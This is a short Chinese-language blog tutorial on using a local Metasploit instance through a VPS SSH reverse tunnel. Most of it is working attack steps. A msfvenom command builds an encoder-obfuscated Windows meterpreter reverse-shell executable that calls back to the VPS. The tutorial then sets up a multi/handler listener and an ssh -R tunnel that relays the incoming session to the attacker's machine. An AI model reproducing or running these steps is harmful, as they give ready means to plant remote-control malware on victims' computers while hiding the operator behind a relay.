通过VPS SSH隧道使用本地msf

很简单的东西,就是ssh隧道,关键就是需要配置一些ssh配置文件,大牛别喷。
这里首先需要配置VPS ssh服务
编辑 /etc/ssh/sshd_config
在文件最后添加:

GatewayPorts yes
之后配置msf客户端:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=[vpsIP] LPORT=8888 -f exe > abc.exe

之后本地启用监听:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.100
lhost => 192.168.2.100
msf exploit(handler) > set lport 8888
lport => 8888
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.2.100:8888

开启ssh隧道:
ssh -N -R 8888:192.168.2.100:8888 [email protected]
客户端被执行以后,成功返回回话:
通过VPS SSH隧道使用本地msf_第1张图片

你可能感兴趣的:(通过VPS SSH隧道使用本地msf)